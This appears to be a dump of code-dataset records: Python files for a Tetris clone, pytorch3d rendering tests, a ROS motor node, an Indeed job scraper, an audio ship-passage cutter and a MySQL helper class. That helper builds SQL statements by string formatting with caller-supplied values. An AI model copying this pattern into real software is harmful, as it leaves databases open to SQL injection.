pygame.KEYDOWN: # User pressed a key down\n keyCheck()\n\n bottomshape.update(shape)\n # increase delay timer\n delay += 1\n if delay >= 10: # if 10 ticks have passed, make the shape fall\n shape.falling()\n delay = 0 # reset the delay counter\n\n # if our slow time is on then count until 50 ticks have gone by and turn off slow time\n if gameboard.slowtimeon:\n slowtimedelay += 1\n if slowtimedelay > 50:\n slowtimedelay = 0\n gameboard.slowtimeon = False\n\n # this swaps the shape if we have the power up and it's being used\n if gameboard.swapshape:\n shape = nextshape\n bottomshape = BottomShape(shape.shapeNum)\n nextshape = Shape()\n gameboard.swapshape = False\n\n# if our shape has finished moving get us a new shape\n if shape.active == False:\n gameboard.clearFullRows()\n shape = nextshape\n bottomshape = BottomShape(shape.shapeNum)\n nextshape = Shape()\n\n # checks to see if we've lost or not and then resets if we have\n if gameboard.checkloss():\n checkHighScores()\n gameboard = GameBoard(WHITE, shape.blockList[0].size)\n shape = Shape()\n delay = 0\n slowtimedelay = 0\n bottomshape = BottomShape(shape.shapeNum)\n nextshape = Shape()\n\n #draws everything to thes screen\n drawScreen()\n # puts in a one tenth of second delay giving the user time to react, faster based on the level we are on\n if (0.11 - gameboard.level * 0.01 >= 0):\n time.sleep(0.11 - gameboard.level * 0.01 + gameboard.slowtimeon * 0.1)\n\n","sub_path":"TetrisClone_ScottKing.py","file_name":"TetrisClone_ScottKing.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"83191388","text":"# Estimate camera pose demo\n# From: https://github.com/facebookresearch/pytorch3d/blob/master/docs/tutorials/camera_position_optimization_with_differentiable_rendering.ipynb\n\nimport os\nimport torch\nimport numpy as np\nimport imageio\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\n# io utils\nfrom pytorch3d.io import load_obj\n\n# datastructures\nfrom pytorch3d.structures import Meshes\nfrom pytorch3d.renderer.mesh.textures import TexturesVertex\n\n# 3D transformations functions\nfrom pytorch3d.transforms import Rotate, Translate\n\n# rendering components\nfrom pytorch3d.renderer import (\n OpenGLPerspectiveCameras, look_at_view_transform, look_at_rotation,\n RasterizationSettings, MeshRenderer, MeshRasterizer, BlendParams,\n SoftSilhouetteShader, SoftPhongShader, HardPhongShader, PointLights\n)\n\n\ndef prepareRenderer(sigma_, gamma_, blur_radius_, faces_per_pixel_, device):\n blend_params = BlendParams(sigma=sigma_, gamma=gamma_)\n\n raster_settings = RasterizationSettings(\n image_size=256,\n blur_radius=np.log(1. / blur_radius_ - 1.) * blend_params.sigma,\n faces_per_pixel=faces_per_pixel_,\n bin_size=0\n )\n\n # renderer = MeshRenderer(\n # rasterizer=MeshRasterizer(\n # cameras=cameras,\n # raster_settings=raster_settings\n # ),\n # shader=SoftSilhouetteShader(blend_params=blend_params)\n # )\n lights = PointLights(device=device, location=((2.0, 2.0, -2.0),))\n renderer = MeshRenderer(\n rasterizer=MeshRasterizer(\n cameras=cameras,\n raster_settings=raster_settings\n ),\n shader=SoftPhongShader(blend_params=blend_params, device=device, lights=lights)\n )\n return renderer\n\n\n# Set the cuda device\ndevice = torch.device(\"cuda:0\")\ntorch.cuda.set_device(device)\n\n# Load the obj and ignore the textures and materials.\nverts, faces_idx, _ = load_obj(\"../data/cad-models/teapot.obj\")\n#verts, faces_idx, _ = load_obj(\"../data/ikea-mug/cad/ikea_mug_scaled_reduced_centered.obj\")\nfaces = faces_idx.verts_idx\n\n# Initialize each vertex to be white in color.\nverts_rgb = torch.ones_like(verts)[None] # (1, V, 3)\ntextures = TexturesVertex(verts_features=verts_rgb.to(device))\n\n# Create a Meshes object for the teapot. Here we have only one mesh in the batch.\nteapot_mesh = Meshes(\n verts=[verts.to(device)],\n faces=[faces.to(device)],\n textures=textures\n)\n\n\n# Initialize an OpenGL perspective camera.\ncameras = OpenGLPerspectiveCameras(device=device)\n\n# Select the viewpoint using spherical angles\nviewpoint = [2.5, 140.0, 10.0] # distance, elevation, azimuth, ok...\n\n# Get the position of the camera based on the spherical angles\nR, T = look_at_view_transform(viewpoint[0], viewpoint[1], viewpoint[2], device=device)\n\n\nsigma = [0.001] #[1e-3, 1e-4 ,1e-5]\ngamma = [1.0] #[1e-0, 1e-1 ,1e-2, 1e-3, 1e-4 ,1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10] #[0.001] #[1e-3, 1e-4 ,1e-5]\nfaces = [100] #[1,10,20,30,40,50,60,70,80,90,100,110,120,130,140,150,160,170,180,190,200]\nradius = [1e-0, 1e-1 ,1e-2, 1e-3] #, 1e-4 ,1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10]\n\nfor s in sigma:\n for g in gamma:\n for f in faces:\n for r in radius:\n print(\"S: {0}, G: {1}, F: {2}, R: {3}\".format(s,g,f,r))\n renderer = prepareRenderer(s, g, r, f, device)\n image = renderer(meshes_world=teapot_mesh, R=R, T=T)\n image = image.detach().squeeze().cpu().numpy()[..., :3]\n #image = image[..., :3]\n print(image.shape)\n print(np.mean(image))\n\n fig = plt.figure(figsize=(6,6))\n plt.imshow(image)\n plt.title(\"S: {0}, G: {1}, F: {2}, R: {3}\".format(s,g,f,r))\n plt.grid(\"off\")\n plt.axis(\"off\")\n fig.tight_layout()\n fig.savefig(\"s{0}g{1}f{2}r{3}.png\".format(s,g,f,r), dpi=fig.dpi)\n plt.close()\n","sub_path":"pytorch3d/demo/parameter-test.py","file_name":"parameter-test.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"337644396","text":"#!/usr/bin/env python\n\"\"\"Motor control ROS node\"\"\"\n\nimport time\nimport math\nimport atexit\n\nimport rospy\nfrom std_msgs.msg import Int32\n\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT\n\nimport RPi.GPIO as GPIO\n\n\nNB_WHEEL_TICK = 40\nNB_ACCUMUL = 10\n\n\n\nclass MotorCtrl(object):\n \"\"\"MotorCtrl class implementing motor control\"\"\"\n def __init__(self):\n self.cm_per_sec_1 = 0\n self.cm_per_sec_2 = 0\n self.rpm_1 = 0\n self.rpm_2 = 0\n self.elapse_1 = 0\n self.elapse_2 = 0\n self.sensor_1 = 15\n self.sensor_2 = 12\n self.pulse_1 = 0\n self.pulse_2 = 0\n self.start_timer_1 = time.time()\n self.start_timer_2 = time.time()\n self.accumul_1 = 0\n self.accumul_2 = 0\n\n\n self.nb_tour = 0\n\n self.used_1 = 0\n self.used_2 = 0\n\n self.init_gpio()\n self.init_interrupt()\n self.motor_handle = Adafruit_MotorHAT(addr=0x70)\n self.motor_2 = self.motor_handle.getMotor(2)\n self.motor_1 = self.motor_handle.getMotor(1)\n self.current_speed = 0\n\n\n\n atexit.register(self.turn_off_motors)\n\n\n\n def ros_node_start(self):\n \"\"\"Init method, in charge of launching the ros node\n\tAlso subscribes to relevant topics\"\"\"\n rospy.init_node('motorCtrl', anonymous=False)\n\n #Subscription to motor control topics\n rospy.Subscriber('/motor/set_speed', Int32, self.cb_set_speed)\n rospy.Subscriber('/motor/start', Int32, self.cb_start)\n rospy.Subscriber('/motor/stop', Int32, self.cb_stop)\n rospy.Subscriber('/motor/backward', Int32, self.cb_bkwd)\n rospy.Subscriber('/motor/turn_left', Int32, self.cb_left)\n rospy.Subscriber('/motor/turn_right', Int32, self.cb_right)\n\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\n\n def init_interrupt(self):\n \"\"\"registers interrupt for GPIO events used in speed monitoring\"\"\"\n GPIO.add_event_detect(self.sensor_1,\n GPIO.BOTH,\n callback=self.cb_calculate_elapse_1,\n bouncetime=5)\n GPIO.add_event_detect(self.sensor_2,\n GPIO.BOTH,\n callback=self.cb_calculate_elapse_2,\n bouncetime=5)\n\n # recommended for auto-disabling motors on shutdown!\n def turn_off_motors(self):\n \"\"\"Turns off motors at electrical level\"\"\"\n self.motor_handle.getMotor(1).run(Adafruit_MotorHAT.RELEASE)\n self.motor_handle.getMotor(2).run(Adafruit_MotorHAT.RELEASE)\n\n def init_gpio(self): # initialize GPIO\n \"\"\"Initialize board GPIO\"\"\"\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(self.sensor_1, GPIO.IN, GPIO.PUD_UP)\n GPIO.setup(self.sensor_2, GPIO.IN, GPIO.PUD_UP)\n\n\n\n def set_speed(self, speed):\n \"\"\"Method to set motor speed,\n\twith offset to compensate different spee dat same value\"\"\"\n self.motor_1.setSpeed(speed + 0)\n self.motor_2.setSpeed(speed + 9)\n\n\n def turn_left(self, speed):\n \"\"\"Turns left by reverting motor speeds\"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.BACKWARD)\n self.motor_2.run(Adafruit_MotorHAT.FORWARD)\n\n def turn_right(self, speed):\n \"\"\"Turns right by reverting motor speeds\"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.FORWARD)\n self.motor_2.run(Adafruit_MotorHAT.BACKWARD)\n\n def move_fwd(self, speed):\n \"\"\"Moves forward \"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.FORWARD)\n self.motor_2.run(Adafruit_MotorHAT.FORWARD)\n\n def move_bkwd(self, speed):\n \"\"\"Moves backward \"\"\"\n self.motor_1.setSpeed(speed)\n self.motor_2.setSpeed(speed)\n self.motor_1.run(Adafruit_MotorHAT.BACKWARD)\n self.motor_2.run(Adafruit_MotorHAT.BACKWARD)\n\n def move_stop(self):\n \"\"\"Stops the motors \"\"\"\n self.motor_1.setSpeed(0)\n self.motor_2.setSpeed(0)\n self.turn_off_motors()\n\n #TODO : warning : ambiguous use of speed.\n #spread across motor control node and robotCore, passing the speed.\n #Check also usages in methods above, as the set_speed methods may be useless\n #It means currently there is no offset used to calibrate speed between the two motors\n #To be fixed.\n def cb_start(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n self.move_fwd(self.current_speed)\n rospy.loginfo(rospy.get_caller_id() + ' received command start')\n\n def cb_stop(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n self.move_stop()\n rospy.loginfo(rospy.get_caller_id() + ' received command stops')\n\n def cb_bkwd(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n self.move_bkwd(self.current_speed)\n rospy.loginfo(rospy.get_caller_id() + ' received command stops')\n\n\n def cb_left(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n rospy.loginfo(rospy.get_caller_id() + ' received command left')\n self.turn_left(self.current_speed)\n\n def cb_right(self, _):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n rospy.loginfo(rospy.get_caller_id() + ' received command right')\n self.turn_right(self.current_speed)\n\n def cb_set_speed(self, data):\n \"\"\"Callback used upon ROS topic reception \"\"\"\n value = data.data\n rospy.loginfo(rospy.get_caller_id() + 'received set_speed command : ' + str(value))\n self.current_speed = value\n self.set_speed(value)\n\n\n # callback function\n def cb_calculate_elapse_1(self, channel):\n \"\"\"callback function for speed sensor 1\"\"\"\n self.accumul_1 += 1\n\n if self.accumul_1 <= NB_ACCUMUL:\n self.pulse_1 += 1\n else:\n self.pulse_1 += 1\n self.accumul_1 = 0\n # elapse for every 1 wheel tick accumulated made!\n self.elapse_1 = time.time() - self.start_timer_1\n # let current time equals to start_timer\n self.start_timer_1 = time.time()\n self.used_1 = 0\n\n\n\n def cb_calculate_elapse_2(self, channel):\n \"\"\"callback function for speed sensor 2\"\"\"\n self.accumul_2 += 1\n\n\n #print pulse_2\n if self.accumul_2 < NB_ACCUMUL:\n self.pulse_2 += 1\n #print (\"skip\")\n else:\n self.pulse_2 += 1\n self.accumul_2 = 0\n # elapse for every 1 wheel tick accumulated made!\n self.elapse_2 = time.time() - self.start_timer_2\n # let current time equals to start_timer\n self.start_timer_2 = time.time()\n self.nb_tour += 1\n self.used_2 = 0\n\n\n def calculate_speed(self, r_cm):\n \"\"\"calculate speed based on sensor inputs \"\"\"\n\t#TODO : separate this sensor calculation into a dedicated class\n # calculate wheel circumference in CM\n circ_cm = (2*math.pi)*r_cm\n\n # to avoid DivisionByZero error\n if self.elapse_1 != 0:\n self.rpm_1 = (((1/self.elapse_1) * 60) / NB_WHEEL_TICK) * NB_ACCUMUL\n if self.used_1 == 0:\n # calculate CM/sec\n self.cm_per_sec_1 = circ_cm / self.elapse_1\n self.used_1 = 1\n else:\n self.cm_per_sec_1 = self.cm_per_sec_1 / 2\n\n # to avoid DivisionByZero error\n if self.elapse_2 != 0:\n self.rpm_2 = ((1/self.elapse_2 * 60) / NB_WHEEL_TICK) * NB_ACCUMUL\n if self.used_2 == 0:\n # calculate CM/sec\n self.cm_per_sec_2 = circ_cm / self.elapse_2\n self.used_2 = 1\n else:\n self.cm_per_sec_2 = self.cm_per_sec_2/2\n\n\n\n\n\n\nif __name__ == '__main__':\n my_motor_ctrl = MotorCtrl()\n my_motor_ctrl.ros_node_start()\n","sub_path":"scripts/motorCtrl.py","file_name":"motorCtrl.py","file_ext":"py","file_size_in_byte":8093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"544923445","text":"'''Given a time in -hour AM/PM format, convert it to military (24-hour) time.\n\nNote: Midnight is 12:00:00AM on a 12-hour clock, and 00:00:00 on a 24-hour clock. Noon is 12:00:00PM on a 12-hour clock, and 12:00:00 on a 24-hour clock.\n\nFunction Description\n\nComplete the timeConversion function in the editor below. It should return a new string representing the input time in 24 hour format.\n\ntimeConversion has the following parameter(s):\n\ns: a string representing time in hour format\nInput Format\n\nA single string containing a time in -hour clock format (i.e.: or ), where and .\n\nConstraints\n\nAll input times are valid\nOutput Format\n\nConvert and print the given time in -hour format, where .'''\n\n#!/bin/python3\n\nimport os\nimport sys\nfrom datetime import datetime\n\ndef timeConversion(input_str):\n try:\n output_str = datetime.strptime(input_str, \"%I:%M:%S%p\").strftime(\"%H:%M:%S\")\n except ValueError:\n output_str = None\n return(output_str)\n\nif __name__ == '__main__':\n f = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = timeConversion(s)\n\n f.write(result + '\\n')\n\n f.close()\n","sub_path":"algo_1.py","file_name":"algo_1.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"597632192","text":"import pymysql\n\n\nclass MengSql(object):\n def __init__(self, host, user, passwd, db_name):\n self.host = host\n self.user = user\n self.passwd = passwd\n self.db_name = db_name\n\n def connet(self):\n self.db = pymysql.connect(self.host, self.user, self.passwd, self.db_name)\n self.cursor = self.db.cursor()\n\n def close(self):\n self.cursor.close()\n self.db.close()\n\n def get_one(self, sql):\n try:\n self.connet()\n self.cursor.execute(sql)\n result = self.cursor.fetchone()\n self.close()\n except Exception as e:\n result = None\n print(\"查询失败: \", e)\n return result\n\n def get_all(self, sql):\n try:\n self.connet()\n self.cursor.execute(sql)\n result = self.cursor.fetchall()\n self.close()\n except Exception as e:\n result = None\n print(\"查询失败: \", e)\n return result\n\n def __edit(self, sql):\n count = 0\n try:\n self.connet()\n count = self.cursor.execute(sql)\n self.db.commit()\n self.close()\n except Exception as e:\n print(\"事物提交失败: \", e)\n self.db.rollback()\n return count\n\n def insert(self, table, items):\n if not all([table, items]):\n return print('参数不完整')\n base_sql = \"insert into %s({}) values({})\" % table\n key_sql = ','.join(list(items.keys()))\n values = list(items.values())\n value_sql = ''\n for value in values[0:-1]:\n if isinstance(value, int):\n value_sql += str(value) + ','\n else:\n value_sql += \"'\" + value + \"',\"\n if isinstance(values[-1], int):\n value_sql += str(values[-1])\n else:\n value_sql += \"'\" + values[-1] + \"'\"\n return self.__edit(base_sql.format(key_sql, value_sql))\n\n def find_many(self, table, fields=None, query=None):\n \"\"\"select * form user where id < 5 \"\"\"\n base_sql = \"select {} from %s \" % table\n if isinstance(fields, str):\n base_sql = base_sql.format(fields)\n elif fields and hasattr(fields, '__iter__'):\n base_sql = base_sql.format(','.join(fields))\n else:\n base_sql = base_sql.format('*')\n if query:\n base_sql += query\n return self.get_all(base_sql)\n\n def update(self, table, set_sql, condition):\n \"\"\" update users set username='xiaomaoyu' where id=3 \"\"\"\n return self.__edit(\"update {} set {} where {}\".format(table, set_sql, condition))\n\n def delete(self, table, condition):\n \"\"\" delete from users where id > 999 \"\"\"\n return self.__edit(\"delete from {} where {}\".format(table, condition))","sub_path":"super/db_tools/meng_sql.py","file_name":"meng_sql.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"277433225","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode\nfrom tqdm import tqdm\nimport nltk\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nimport sys, re, string, datetime\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--term\", help=\"searchterm\")\nparser.add_argument(\"--l\", help=\"location\")\nparser.add_argument(\"--type\", help=\"search type q=keyword search | as_ttl=title \" ,default=\"q\")\nparser.add_argument(\"--pages\", help=\"number of pages\", default=\"3\")\n\nargs = parser.parse_args()\n\n\nif (len(sys.argv) < 3): \n print(\"\\n\\tUsage: indeedminer.py \")\n print('\\te.g. $pythonw indeedminer.py \"HR Manager\" \"New York\"\\n')\n exit()\n\nsearch_page = int(args.pages)\nsearchpage=args.pages\nsearch_keyword= args.term\nlocation = args.l\nparams = {\n args.type:args.term,\n 'l':args.l\n }\n#as_ttl=\n#replace url_prefix with your favorite country from https://www.indeed.com/worldwide\nurl_prefix = \"https://www.indeed.com\" \nurl = url_prefix + \"/jobs?\"+urlencode(params)\n\ndef getJobLinksFromIndexPage(soup): \n jobcards = soup.find_all('div', {'class':'jobsearch-SerpJobCard row result'})\n \n job_links_arr = []\n \n #get job links\n for jobcard in tqdm(jobcards): \n job_title_obj = jobcard.find('a', {'class':'turnstileLink'})\n job_title_link = job_title_obj.get('href')\n job_links_arr.append(job_title_link)\n \n return job_links_arr\n\ndef getJobInfoLinks(url, next_page_count, url_prefix):\n job_links_arr = []\n \n while True: \n if (next_page_count < 1):\n break \n \n next_page_count -= 1\n \n html = urlopen(url)\n soup = BeautifulSoup(html, 'lxml')\n \n job_links_arr += getJobLinksFromIndexPage(soup)\n\n pagination = soup.find('div', {'class':'pagination'}) \n next_link = \"\"\n for page_link in reversed(pagination.find_all('a')):\n #reserve the pagination array to load the last element\n next_link_idx = page_link.get_text().find(\"Next\")\n if (next_link_idx >= 0):\n next_link = page_link.get('href') \n break \n \n if (next_link == \"\"):\n break\n \n url = url_prefix+next_link \n \n return job_links_arr \n\ncurrent_datetime = datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')\nprint(\"Getting job links in {} page(s)...\".format(search_page))\njob_links_arr = getJobInfoLinks(url, search_page, url_prefix)\n\n#if no nltk, go download\ntry:\n nltk.data.find('tokenizers/punkt')\nexcept LookupError:\n nltk.download('punkt')\n\npunctuation = string.punctuation\njob_desc_arr=[] \nprint(\"Getting job details in {} post(s)...\".format(len(job_links_arr)))\nfor job_link in tqdm(job_links_arr): \n try:\n job_link = url_prefix+job_link\n #print(\"Handling->{}\".format(job_link))\n job_html = urlopen(job_link)\n job_soup = BeautifulSoup(job_html, 'lxml')\n job_desc = job_soup.find('div', {'class':'jobsearch-JobComponent-description'})\n job_meta = job_desc.find('div', {'class':'jobsearch-JobMetadataHeader-item'})\n #remove job meta\n if (job_meta is not None): \n job_meta.decompose()\n #add a space before each
  • to add spacing\n for li_tag in job_desc.findAll('li'):\n li_tag.insert(0, \" \") \n job_desc = li_tag.get_text() \n #job_desc = job_desc.get_text() \n #remove http \n job_desc = re.sub('https?:\\/\\/.*[\\r\\n]*', '', job_desc, flags=re.MULTILINE)\n job_desc = re.sub('data|description|working|years|year|time|1|2|3|4', '', job_desc, flags=re.MULTILINE)\n \n #replace punctutaion to space\n job_desc = job_desc.translate(job_desc.maketrans(punctuation, ' ' * len(punctuation))) \n job_desc_arr.append(job_desc)\n except:\n print(\"An exception occurred\")\n\n\nstop_words = stopwords.words('english') \nextra_stop_words = [\"experience\", \"position\", \"work\", \"please\", \"click\", \"must\", \"may\", \"required\", \"preferred\", \n \"type\", \"including\", \"strong\", \"ability\", \"needs\", \"apply\", \"skills\", \"requirements\", \"company\", \n \"knowledge\", \"job\", \"responsibilities\", \"big data\", \"systems\", \"teams\", \"design\", \"solutions\",\"business\",\n \"technological\",\"data\", \"technologies\", \"degree\",\"using\",\"big\", \"technical\", \"technology\", location.lower()] + location.lower().split()\nstop_words += extra_stop_words\n\nprint(\"Generating Word Cloud...\")\n#TFIDF\ntfidf_para = {\n \"stop_words\": stop_words,\n \"analyzer\": 'word', #analyzer in 'word' or 'character' \n \"token_pattern\": r'\\w{1,}', #match any word with 1 and unlimited length \n \"sublinear_tf\": False, #False for smaller data size #Apply sublinear tf scaling, to reduce the range of tf with 1 + log(tf)\n \"dtype\": int, #return data type \n \"norm\": 'l2', #apply l2 normalization\n \"smooth_idf\":False, #no need to one to document frequencies to avoid zero divisions\n \"ngram_range\" : (1, 2), #the min and max size of tokenized terms\n \"max_features\": 500 #the top 500 weighted features\n}\ntfidf_vect = TfidfVectorizer(**tfidf_para)\ntransformed_job_desc = tfidf_vect.fit_transform(job_desc_arr)\n\n#Generate word cloud\nfreqs_dict = dict([(word, transformed_job_desc.getcol(idx).sum()) for word, idx in tfidf_vect.vocabulary_.items()])\nw = WordCloud(width=800,height=600,mode='RGBA',background_color='white',max_words=500).fit_words(freqs_dict)\nplt.figure(figsize=(12,9))\nplt.title(\"Keywords:[{}] Location:[{}] {}\".format(search_keyword,location, current_datetime))\nplt.imshow(w)\nplt.axis(\"off\")\nplt.show()","sub_path":"indeedminer.py","file_name":"indeedminer.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"166728565","text":"from pydub import AudioSegment\nimport numpy as np\nfrom datetime import datetime, timedelta \nimport os \nimport unpickle as up\nfrom dat_extract.extract.Ship_Variable_Extraction import Ship\nimport time\nfrom scipy import interpolate\n\nfilepath = \"J:\\ShippingCINMS_data\\COP\"\nrootdir = \"J:\\Pickled_Data\\\\\" #files with ship passages\ndestination_folder = \"J:\\CPA_WAV\\\\\"\n\n#class to hold all variables of mmsis\nclass mmsi:\n def __init__(self,mmsi,weight,length,hp):\n self.mmsi = mmsi\n self.weight = weight\n self.length = length\n self.hp = hp\n\ndef extract_mmsi(file):\n mmsis = []\n i=0\n with open(file, encoding=\"utf8\",errors = 'ignore') as fp: #extract specific lines\n for x, line in enumerate(fp):\n newMMSI = mmsi(0,0,0,0)\n mmsis.append(newMMSI)\n values = [x.strip() for x in line.split(',')]\n if values[4] != 'NA':\n mmsis[i].mmsi = int(values[4]) #first value is actual mmsi\n else:\n mmsis[i].mmsi = 0\n \n if values[3] != 'NA': \n mmsis[i].IMO = int(values[3])\n else:\n mmsis[i].IMO = 0\n \n # mmsis[i].weight = float(values[4]) #2 value is Dead weight\n if values[7] != 'NA':\n mmsis[i].length = float(values[7]) #3 value is length of ship\n else:\n mmsis[i].length = 0\n i+=1\n return mmsis\n #get the true length of the ship \ndef get_length(ship,mmsis):\n skip = True\n for mmsi in mmsis:\n if ship.mmsi == mmsi.mmsi and ship.IMO == mmsi.IMO:\n ship.length = mmsi.length\n skip = False\n return skip\n#finds nearest value in an array \ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return array[idx]\n#converts time to a more usable format\ndef better_seconds(t):\n new_time = time.mktime(t.timetuple())\n return new_time\n#finds a value in an array and returns the index\ndef find_index(arr,value):\n result = np.where(arr == value)\n return result[0][0]\n\n#lines up the times from timestamps in the txt file with the time in the wav file \ndef convert_time(ship):\n \n start_time = find_nearest(ship.sampletimes,ship.file_time) #get the start index and cut array to fit it\n start_index = ship.sampletimes.index(start_time)\n times = ship.sampletimes[start_index:]\n cpa_index = ship.sampletimes.index(find_nearest(ship.sampletimes,ship.cpa_datetime))\n #not normal if cpa is is not in wav file\n if (start_time>=ship.cpa_datetime) or (len(times)<10):\n normal = False\n else:\n normal = True\n result_array = []\n for time in times:\n result_array.append(better_seconds(time) - better_seconds(times[0])) #subtract start time\n cpa_time = better_seconds(ship.cpa_datetime) - better_seconds(times[0]) #get new cpa_time in relation to wav file time\n \n return result_array, start_index, cpa_index,cpa_time,normal\n\n#creates new array of distances to match wav file ship passage\ndef new_distances(ship,start_index,con_times):\n\n distances = ship.distance[start_index:]\n inter = interpolate.interp1d(con_times,distances, axis=0, fill_value=\"extrapolate\")\n new_times = np.arange(0,con_times[len(con_times)-1],0.1)\n new_distances = inter(new_times)\n \n return new_distances,new_times\n \n#uses all these pieces to find the correct times to cut the file to exactly one ship crossing\ndef find_ship_passage(ship,distances,new_times,cpa_time,cpa_sog):\n\n cpa_time = find_nearest(new_times, cpa_time)\n cpa_index = find_index(new_times,cpa_time)\n cpa_distance = distances[cpa_index]\n \n ship_length_km = ship.length/1000\n tan30 = 0.57735026919\n sog_kmps = cpa_sog / 1943.844\n \n pre_time = (cpa_time - ((ship_length_km * tan30)/sog_kmps))\n post_time = (cpa_time + ((ship_length_km * tan30)/sog_kmps))\n \n pre_time = find_nearest(new_times,pre_time)\n post_time = find_nearest(new_times,post_time)\n \n\n pre_index = find_index(new_times,pre_time)\n post_index = find_index(new_times,post_time)\n \n \n pre_dis = distances[pre_index]\n post_dis = distances[post_index]\n \n if pre_time > post_time: #case where the ship is going towards hydrophone\n hold = pre_time\n pre_time = post_time\n post_time = hold\n # print(cpa_time)\n # print(cpa_distance)\n # print(pre_dis)\n # print(post_dis)\n # print(pre_time)\n # print(post_time)\n \n return pre_time,post_time\n\n#cuts wav file at specific times start and stop are in seconds \n#cutting happens in milliseconds\ndef cut_wav(start,stop,wav):\n \n start = start*1000\n stop = stop*1000\n \n wav_handle = AudioSegment.from_wav(wav)\n new_wav = wav_handle[start:stop]\n \n return new_wav\n\n#goes through ships only cutting normal ones and saves the new wav files\ndef main(rootdir,destination):\n i = 0\n mmsis = extract_mmsi('J:\\VZDATAALL.csv')\n for ships in up.unpickle_batch(rootdir, 100, 400, 500):\n for ship in ships:\n \n try:\n wavfilepath = ship.filepath + ship.id + '.wav' #the original wav file\n destination = destination_folder + ship.year_month +'\\\\' + ship.id + '.wav'\n \n \n \n skip = get_length(ship,mmsis)\n \n converted_times, start_index, cpa_index,cpa_time,normal = convert_time(ship)\n cpa_sog = ship.SOG[cpa_index]\n if (not normal):\n i+=1\n print('bad ' + str(i))\n elif skip:\n i+=1\n print('mmsi not included ' + str(i))\n else:\n distances, new_times = new_distances(ship, start_index, converted_times)\n pre, post = find_ship_passage(ship,distances,new_times,cpa_time,cpa_sog)\n \n pass_wav = cut_wav(pre,post,wavfilepath)\n pass_wav.export(destination,format=\"wav\")\n \n print(wavfilepath)\n pass_wav.export(destination,format=\"wav\")\n \n \n \n except:\n up.one_jar(rootdir,ship,True)\n print('something went wrong')\n pass\n \nmain(rootdir,destination_folder)","sub_path":"scripts/Passage_WAV_Cutter.py","file_name":"Passage_WAV_Cutter.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"389228854","text":"import pygame\nimport src.MainImages as main_img\n\n\nclass CeilingClass(pygame.sprite.Sprite):\n def __init__(self, width, height, rect_x, rect_y):\n \"\"\"\n :params: współrzędne opisujące położenie danego sufitu\n :type: int\n \"\"\"\n self.width = width\n self.height = height\n self.image = pygame.Surface([self.width, self.height])\n self.image = self.image.convert()\n self.image.fill((250, 250, 250))\n self.rect = self.image.get_rect()\n self.rect.x = self.start_position_x = rect_x\n self.rect.y = self.start_position_y = rect_y\n\n def draw(self, surface):\n blocks_counter = int(self.width / main_img.BLOCKS_WIDTH)\n if blocks_counter == 1:\n surface.blit(main_img.single_platform, self.rect)\n else:\n for i in range(blocks_counter):\n if i == 0:\n surface.blit(main_img.ceiling_left, (self.rect[0] + i * main_img.BLOCKS_WIDTH, self.rect[1]))\n elif i == blocks_counter - 1:\n surface.blit(main_img.ceiling_right, (self.rect[0] + i * main_img.BLOCKS_WIDTH, self.rect[1]))\n else:\n surface.blit(main_img.ceiling_center, (self.rect[0] + i * main_img.BLOCKS_WIDTH, self.rect[1]))\n\n def move_ceiling_x(self, speed):\n self.rect[0] += speed\n","sub_path":"src/PlatformsMainPackage/CeilingClass.py","file_name":"CeilingClass.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"64961382","text":"from flask import Flask, url_for, jsonify, request, render_template, redirect\nfrom flask.ext.sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://daniel@localhost/mydb'\ndb = SQLAlchemy(app)\n\n\nclass ValidationError(ValueError):\n pass\n\n\nclass BMWReddit(db.Model):\n __tablename__ = 'bmwreddit'\n id = db.Column(db.Integer, primary_key=True)\n date = db.Column(db.String(50))\n score = db.Column(db.Integer)\n domain = db.Column(db.String(100))\n title = db.Column(db.String(250))\n author = db.Column(db.String(50))\n upVote = db.Column(db.Integer)\n downVote = db.Column(db.Integer)\n comments = db.Column(db.Integer)\n\n def 